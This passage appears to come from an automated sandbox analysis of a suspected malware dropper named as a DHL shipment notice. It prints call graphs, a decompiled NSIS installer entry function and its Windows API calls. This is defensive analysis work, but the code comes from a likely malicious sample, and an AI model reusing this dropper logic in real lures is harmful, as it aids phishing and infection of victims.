calls 4447->4449 4450 402f5f 4448->4450 4449->4447 4450->4442 4451 402f63 RegDeleteKeyW 4450->4451 4451->4442 4452 401735 4453 402da6 17 API calls 4452->4453 4454 40173c SearchPathW 4453->4454 4455 401757 4454->4455 4456 405037 GetDlgItem GetDlgItem 4457 405089 7 API calls 4456->4457 4468 4052ae 4456->4468 4458 405130 DeleteObject 4457->4458 4459 405123 SendMessageW 4457->4459 4460 405139 4458->4460 4459->4458 4462 405170 4460->4462 4463 4066ab 17 API calls 4460->4463 4461 405390 4465 40543c 4461->4465 4475 4053e9 SendMessageW 4461->4475 4499 4052a1 4461->4499 4464 4045ca 18 API calls 4462->4464 4469 405152 SendMessageW SendMessageW 4463->4469 4470 405184 4464->4470 4466 405446 SendMessageW 4465->4466 4467 40544e 4465->4467 4466->4467 4477 405460 ImageList_Destroy 4467->4477 4478 405467 4467->4478 4489 405477 4467->4489 4468->4461 4473 404f85 5 API calls 4468->4473 4495 40531d 4468->4495 4469->4460 4474 4045ca 18 API calls 4470->4474 4471 405382 SendMessageW 4471->4461 4472 404631 8 API calls 4476 40563d 4472->4476 4473->4495 4486 405195 4474->4486 4480 4053fe SendMessageW 4475->4480 4475->4499 4477->4478 4481 405470 GlobalFree 4478->4481 4478->4489 4479 4055f1 4484 405603 ShowWindow GetDlgItem ShowWindow 4479->4484 4479->4499 4483 405411 4480->4483 4481->4489 4482 405270 GetWindowLongW SetWindowLongW 4485 405289 4482->4485 4490 405422 SendMessageW 4483->4490 4484->4499 4487 4052a6 4485->4487 4488 40528e ShowWindow 4485->4488 4486->4482 4491 40526b 4486->4491 4494 4051e8 SendMessageW 4486->4494 4496 405226 SendMessageW 4486->4496 4497 40523a SendMessageW 4486->4497 4509 4045ff SendMessageW 4487->4509 4508 4045ff SendMessageW 4488->4508 4489->4479 4498 405005 4 API calls 4489->4498 4503 4054b2 4489->4503 4490->4465 4491->4482 4491->4485 4494->4486 4495->4461 4495->4471 4496->4486 4497->4486 4498->4503 4499->4472 4500 4055bc 4501 4055c7 InvalidateRect 4500->4501 4504 4055d3 4500->4504 4501->4504 4502 4054e0 SendMessageW 4507 4054f6 4502->4507 4503->4502 4503->4507 4504->4479 4510 404f40 4504->4510 4506 40556a SendMessageW SendMessageW 4506->4507 4507->4500 4507->4506 4508->4499 4509->4468 4513 404e77 4510->4513 4512 404f55 4512->4479 4514 404e90 4513->4514 4515 4066ab 17 API calls 4514->4515 4516 404ef4 4515->4516 4517 4066ab 17 API calls 4516->4517 4518 404eff 4517->4518 4519 4066ab 17 API calls 4518->4519 4520 404f15 lstrlenW wsprintfW SetDlgItemTextW 4519->4520 4520->4512 4521 401d38 4522 402d84 17 API calls 4521->4522 4523 401d3f 4522->4523 4524 402d84 17 API calls 4523->4524 4525 401d4b GetDlgItem 4524->4525 4526 402638 4525->4526 4527 4014b8 4528 4014be 4527->4528 4529 401389 2 API calls 4528->4529 4530 4014c6 4529->4530 4531 40473a lstrlenW 4532 404759 4531->4532 4533 40475b WideCharToMultiByte 4531->4533 4532->4533 4534 404abb 4535 404ae7 4534->4535 4536 404af8 4534->4536 4595 405cb2 GetDlgItemTextW 4535->4595 4538 404b04 GetDlgItem 4536->4538 4543 404b63 4536->4543 4541 404b18 4538->4541 4539 404c47 4544 404df6 4539->4544 4597 405cb2 GetDlgItemTextW 4539->4597 4540 404af2 4542 4068f5 5 API calls 4540->4542 4546 404b2c SetWindowTextW 4541->4546 4547 405fe8 4 API calls 4541->4547 4542->4536 4543->4539 4543->4544 4548 4066ab 17 API calls 4543->4548 4551 404631 8 API calls 4544->4551 4550 4045ca 18 API calls 4546->4550 4552 404b22 4547->4552 4553 404bd7 SHBrowseForFolderW 4548->4553 4549 404c77 4554 406045 18 API calls 4549->4554 4555 404b48 4550->4555 4556 404e0a 4551->4556 4552->4546 4560 405f3d 3 API calls 4552->4560 4553->4539 4557 404bef CoTaskMemFree 4553->4557 4558 404c7d 4554->4558 4559 4045ca 18 API calls 4555->4559 4561 405f3d 3 API calls 4557->4561 4598 40666e lstrcpynW 4558->4598 4562 404b56 4559->4562 4560->4546 4563 404bfc 4561->4563 4596 4045ff SendMessageW 4562->4596 4566 404c33 SetDlgItemTextW 4563->4566 4571 4066ab 17 API calls 4563->4571 4566->4539 4567 404b5c 4569 406a3b 5 API calls 4567->4569 4568 404c94 4570 406a3b 5 API calls 4568->4570 4569->4543 4577 404c9b 4570->4577 4572 404c1b lstrcmpiW 4571->4572 4572->4566 4575 404c2c lstrcatW 4572->4575 4573 404cdc 4599 40666e lstrcpynW 4573->4599 4575->4566 4576 404ce3 4578 405fe8 4 API calls 4576->4578 4577->4573 4581 405f89 2 API calls 4577->4581 4583 404d34 4577->4583 4579 404ce9 GetDiskFreeSpaceW 4578->4579 4582 404d0d MulDiv 4579->4582 4579->4583 4581->4577 4582->4583 4584 404da5 4583->4584 4586 404f40 20 API calls 4583->4586 4585 404dc8 4584->4585 4587 40140b 2 API calls 4584->4587 4600 4045ec EnableWindow 4585->4600 4588 404d92 4586->4588 4587->4585 4590 404da7 SetDlgItemTextW 4588->4590 4591 404d97 4588->4591 4590->4584 4593 404e77 20 API calls 4591->4593 4592 404de4 4592->4544 4594 404a14 SendMessageW 4592->4594 4593->4584 4594->4544 4595->4540 4596->4567 4597->4549 4598->4568 4599->4576 4600->4592 4601 40263e 4602 402652 4601->4602 4603 40266d 4601->4603 4604 402d84 17 API calls 4602->4604 4605 402672 4603->4605 4606 40269d 4603->4606 4613 402659 4604->4613 4607 402da6 17 API calls 4605->4607 4608 402da6 17 API calls 4606->4608 4609 402679 4607->4609 4610 4026a4 lstrlenW 4608->4610 4618 406690 WideCharToMultiByte 4609->4618 4610->4613 4612 40268d lstrlenA 4612->4613 4614 4026e7 4613->4614 4616 40623f 5 API calls 4613->4616 4617 4026d1 4613->4617 4615 406210 WriteFile 4615->4614 4616->4617 4617->4614 4617->4615 4618->4612

                        Executed Functions

                        Function 00403646 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450stringfilecomCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 403646-403696 SetErrorMode GetVersionExW 1 4036d0-4036d7 0->1 2 403698-4036cc GetVersionExW 0->2 3 4036e1-403721 1->3 4 4036d9 1->4 2->1 5 403723-40372b call 406a3b 3->5 6 403734 3->6 4->3 5->6 12 40372d 5->12 7 403739-40374d call 4069cb lstrlenA 6->7 13 40374f-40376b call 406a3b * 3 7->13 12->6 20 40377c-4037de #17 OleInitialize SHGetFileInfoW call 40666e GetCommandLineW call 40666e 13->20 21 40376d-403773 13->21 28 4037e0-4037e2 20->28 29 4037e7-4037fa call 405f6a CharNextW 20->29 21->20 26 403775 21->26 26->20 28->29 32 4038f1-4038f7 29->32 33 4038fd 32->33 34 4037ff-403805 32->34 37 403911-40392b GetTempPathW call 403615 33->37 35 403807-40380c 34->35 36 40380e-403814 34->36 35->35 35->36 39 403816-40381a 36->39 40 40381b-40381f 36->40 44 403983-40399b DeleteFileW call 4030d0 37->44 45 40392d-40394b GetWindowsDirectoryW lstrcatW call 403615 37->45 39->40 42 403825-40382b 40->42 43 4038df-4038ed call 405f6a 40->43 47 403845-40387e 42->47 48 40382d-403834 42->48 43->32 61 4038ef-4038f0 43->61 66 4039a1-4039a7 44->66 67 403b72-403b80 ExitProcess OleUninitialize 44->67 45->44 64 40394d-40397d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403615 45->64 49 403880-403885 47->49 50 40389a-4038d4 47->50 54 403836-403839 48->54 55 40383b 48->55 49->50 56 403887-40388f 49->56 58 4038d6-4038da 50->58 59 4038dc-4038de 50->59 54->47 54->55 55->47 62 403891-403894 56->62 63 403896 56->63 58->59 65 4038ff-40390c call 40666e 58->65 59->43 61->32 62->50 62->63 63->50 64->44 64->67 65->37 71 4039ad-4039c0 call 405f6a 66->71 72 403a4e-403a55 call 403d1d 66->72 68 403b82-403b91 call 405cce ExitProcess 67->68 69 403b97-403b9d 67->69 75 403c15-403c1d 69->75 76 403b9f-403bb4 GetCurrentProcess OpenProcessToken 69->76 87 403a12-403a1f 71->87 88 4039c2-4039f7 71->88 80 403a5a-403a5d 72->80 81 403c22-403c25 ExitProcess 75->81 82 403c1f 75->82 84 403be5-403bf3 call 406a3b 76->84 85 403bb6-403bdf LookupPrivilegeValueW AdjustTokenPrivileges 76->85 80->67 82->81 98 403c01-403c0c ExitWindowsEx 84->98 99 403bf5-403bff 84->99 85->84 91 403a21-403a2f call 406045 87->91 92 403a62-403a76 call 405c39 lstrcatW 87->92 90 4039f9-4039fd 88->90 94 403a06-403a0e 90->94 95 4039ff-403a04 90->95 91->67 107 403a35-403a4b call 40666e * 2 91->107 105 403a83-403a9d lstrcatW lstrcmpiW 92->105 106 403a78-403a7e lstrcatW 92->106 94->90 101 403a10 94->101 95->94 95->101 98->75 100 403c0e-403c10 call 40140b 98->100 99->98 99->100 100->75 101->87 109 403b70 105->109 110 403aa3-403aa6 105->110 106->105 107->72 109->67 112 403aa8-403aad call 405b9f 110->112 113 403aaf call 405c1c 110->113 119 403ab4-403ac4 SetCurrentDirectoryW 112->119 113->119 121 403ad1-403afd call 40666e 119->121 122 403ac6-403acc call 40666e 119->122 126 403b02-403b1d call 4066ab DeleteFileW 121->126 122->121 129 403b5d-403b67 126->129 130 403b1f-403b2f CopyFileW 126->130 129->126 132 403b69-403b6b call 40642e 129->132 130->129 131 403b31-403b51 call 40642e call 4066ab call 405c51 130->131 131->129 140 403b53-403b5a CloseHandle 131->140 132->109 140->129
                        C-Code - Quality: 78%
                        			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x7a8b58 = _v324.dwBuildNumber;
				 *0x7a8b5c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x7a8b5e != 0x600) {
					_t179 = E00406A3B(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069CB(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A3B(0xb);
				 *0x7a8aa4 = E00406A3B(9);
				_t88 = E00406A3B(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x7a8b5c =  *0x7a8b5c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x7a8b60 = _t88;
				SHGetFileInfoW(0x79ff48, _t188,  &_v1016, 0x2b4, _t188); // executed
				E0040666E(0x7a7aa0, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe\" ";
				E0040666E(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x7a8aa0 = 0x400000;
				_t250 = L"\"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe\" " - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M007B3002;
				}
				_t198 = CharNextW(E00405F6A(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F6A(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E00403615(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x7a8b34 == _t188) {
														L77:
														_t119 =  *0x7a8b4c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A3B(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CCE(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x7a8abc == _t188) {
												L51:
												 *0x7a8b4c =  *0x7a8b4c | 0xffffffff;
												_v24 = E00403D1D(_t264);
												goto L68;
											}
											_t218 = E00405F6A(L"\"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe\" ", _t188);
											if(_t218 < L"\"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe\" ") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe\" ";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe\" ") {
													_t189 = E00405C39(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t219 = L"C:\\Users\\jones\\Desktop";
													_t137 = lstrcmpiW(_t234, L"C:\\Users\\jones\\Desktop");
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C1C();
														} else {
															E00405B9F();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t219);
														}
														E0040666E(0x7a9000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x7a9800 = _t143;
														do {
															E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x120)));
															DeleteFileW(0x79f748);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe", 0x79f748, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E0040642E(_t201, 0x79f748, 0);
																	E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x124)));
																	_t152 = E00405C51(0x79f748);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x7a9800 =  *0x7a9800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E0040642E(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E00406045(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
												E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe\" ") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E00403615(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E00403615(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x7a8b40 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}



















































                        0x00403654
                        0x00403655
                        0x0040365c
                        0x0040365f
                        0x00403666
                        0x00403669
                        0x0040367c
                        0x00403682
                        0x00403685
                        0x00403688
                        0x00403696
                        0x0040369e
                        0x004036a9
                        0x004036c2
                        0x004036c4
                        0x004036cc
                        0x004036cc
                        0x004036d7
                        0x004036d9
                        0x004036d9
                        0x004036ee
                        0x00403713
                        0x00403721
                        0x00403724
                        0x0040372b
                        0x00403732
                        0x00403732
                        0x0040372b
                        0x00403734
                        0x00403739
                        0x0040373a
                        0x00403746
                        0x0040374a
                        0x00403751
                        0x0040375f
                        0x00403764
                        0x0040376b
                        0x0040376f
                        0x00403773
                        0x00403775
                        0x00403775
                        0x00403773
                        0x0040377c
                        0x00403783
                        0x00403789
                        0x004037a1
                        0x004037b1
                        0x004037b6
                        0x004037bc
                        0x004037c3
                        0x004037ca
                        0x004037cc
                        0x004037cd
                        0x004037d7
                        0x004037de
                        0x004037e0
                        0x004037e2
                        0x004037e2
                        0x004037f5
                        0x004037f7
                        0x004038f1
                        0x004038f1
                        0x004038f4
                        0x004038f7
                        0x00000000
                        0x00000000
                        0x00403801
                        0x00403802
                        0x00403805
                        0x0040380e
                        0x0040380e
                        0x00403811
                        0x00403814
                        0x00403817
                        0x0040381a
                        0x0040381a
                        0x0040381a
                        0x0040381b
                        0x0040381f
                        0x004038df
                        0x004038e8
                        0x004038ea
                        0x004038ed
                        0x004038f0
                        0x004038f0
                        0x004038f0
                        0x00000000
                        0x00403825
                        0x00403826
                        0x00403827
                        0x0040382b
                        0x00403845
                        0x0040384c
                        0x0040385f
                        0x00403860
                        0x00403875
                        0x0040387a
                        0x0040387c
                        0x0040387e
                        0x0040389a
                        0x004038a1
                        0x004038b4
                        0x004038b5
                        0x004038ca
                        0x004038d0
                        0x004038d2
                        0x004038d4
                        0x004038dc
                        0x004038de
                        0x00000000
                        0x004038de
                        0x004038d8
                        0x004038da
                        0x004038ff
                        0x00403903
                        0x0040390c
                        0x00403911
                        0x00403917
                        0x00403922
                        0x00403924
                        0x00403929
                        0x0040392b
                        0x00403983
                        0x00403988
                        0x00403991
                        0x00403998
                        0x0040399b
                        0x00403b72
                        0x00403b72
                        0x00403b77
                        0x00403b80
                        0x00403b9d
                        0x00403c15
                        0x00403c15
                        0x00403c1d
                        0x00403c1f
                        0x00403c1f
                        0x00403c25
                        0x00403c25
                        0x00403bb4
                        0x00403bc0
                        0x00403bd1
                        0x00403bd8
                        0x00403bdf
                        0x00403bdf
                        0x00403be7
                        0x00403bf3
                        0x00403c01
                        0x00403c0c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403bf5
                        0x00403bf5
                        0x00403bf6
                        0x00403bf8
                        0x00403bf9
                        0x00403bfa
                        0x00403bff
                        0x00403c0e
                        0x00403c10
                        0x00000000
                        0x00403c10
                        0x00000000
                        0x00403bff
                        0x00403bf3
                        0x00403b8a
                        0x00403b91
                        0x00403b91
                        0x004039a7
                        0x00403a4e
                        0x00403a4e
                        0x00403a5a
                        0x00000000
                        0x00403a5a
                        0x004039b8
                        0x004039c0
                        0x00403a12
                        0x00403a12
                        0x00403a18
                        0x00403a1f
                        0x00403a6d
                        0x00403a6f
                        0x00403a74
                        0x00403a76
                        0x00403a7e
                        0x00403a7e
                        0x00403a89
                        0x00403a8e
                        0x00403a95
                        0x00403a9b
                        0x00403a9d
                        0x00403b70
                        0x00403b70
                        0x00403b70
                        0x00000000
                        0x00403aa3
                        0x00403aa3
                        0x00403aa5
                        0x00403aa6
                        0x00403aaf
                        0x00403aa8
                        0x00403aa8
                        0x00403aa8
                        0x00403ab5
                        0x00403abd
                        0x00403ac4
                        0x00403acc
                        0x00403acc
                        0x00403ad9
                        0x00403ae5
                        0x00403aef
                        0x00403aef
                        0x00403af1
                        0x00403af8
                        0x00403b02
                        0x00403b0e
                        0x00403b14
                        0x00403b1a
                        0x00403b1d
                        0x00403b27
                        0x00403b2d
                        0x00403b2f
                        0x00403b33
                        0x00403b44
                        0x00403b4a
                        0x00403b4f
                        0x00403b51
                        0x00403b54
                        0x00403b5a
                        0x00403b5a
                        0x00403b51
                        0x00403b2f
                        0x00403b5d
                        0x00403b64
                        0x00403b64
                        0x00403b64
                        0x00403b64
                        0x00403b6b
                        0x00000000
                        0x00403b6b
                        0x00403a9d
                        0x00403a21
                        0x00403a24
                        0x00403a28
                        0x00403a2d
                        0x00403a2f
                        0x00000000
                        0x00000000
                        0x00403a3b
                        0x00403a46
                        0x00403a4b
                        0x00000000
                        0x00403a4b
                        0x004039c9
                        0x004039e1
                        0x004039f2
                        0x004039f3
                        0x004039f7
                        0x004039f9
                        0x00403a07
                        0x00403a0e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403a0e
                        0x00403a10
                        0x00000000
                        0x00403a10
                        0x00403933
                        0x0040393f
                        0x00403944
                        0x00403949
                        0x0040394b
                        0x00000000
                        0x00000000
                        0x00403953
                        0x0040395b
                        0x0040396c
                        0x00403974
                        0x00403976
                        0x0040397b
                        0x0040397d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040397d
                        0x00000000
                        0x004038da
                        0x00403883
                        0x00403885
                        0x00000000
                        0x00000000
                        0x00403887
                        0x0040388b
                        0x0040388f
                        0x00403896
                        0x00403896
                        0x00403896
                        0x00403896
                        0x00000000
                        0x00403896
                        0x00403891
                        0x00403894
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403894
                        0x0040382d
                        0x00403831
                        0x00403834
                        0x0040383b
                        0x0040383b
                        0x00000000
                        0x0040383b
                        0x00403836
                        0x00403839
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403839
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403807
                        0x00403807
                        0x00403808
                        0x00403809
                        0x00403809
                        0x00000000
                        0x00403807
                        0x00000000

                        APIs
                        • SetErrorMode.KERNELBASE(00008001), ref: 00403669
                        • GetVersionExW.KERNEL32(?), ref: 00403692
                        • GetVersionExW.KERNEL32(0000011C), ref: 004036A9
                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403740
                        • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040377C
                        • OleInitialize.OLE32(00000000), ref: 00403783
                        • SHGetFileInfoW.SHELL32(0079FF48,00000000,?,000002B4,00000000), ref: 004037A1
                        • GetCommandLineW.KERNEL32(007A7AA0,NSIS Error), ref: 004037B6
                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe" ,00000020,"C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe" ,00000000), ref: 004037EF
                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403922
                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403933
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040393F
                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403953
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040395B
                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040396C
                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403974
                        • DeleteFileW.KERNELBASE(1033), ref: 00403988
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A6F
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A7E
                          • Part of subcall function 00405C1C: CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A89
                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe" ,00000000,?), ref: 00403A95
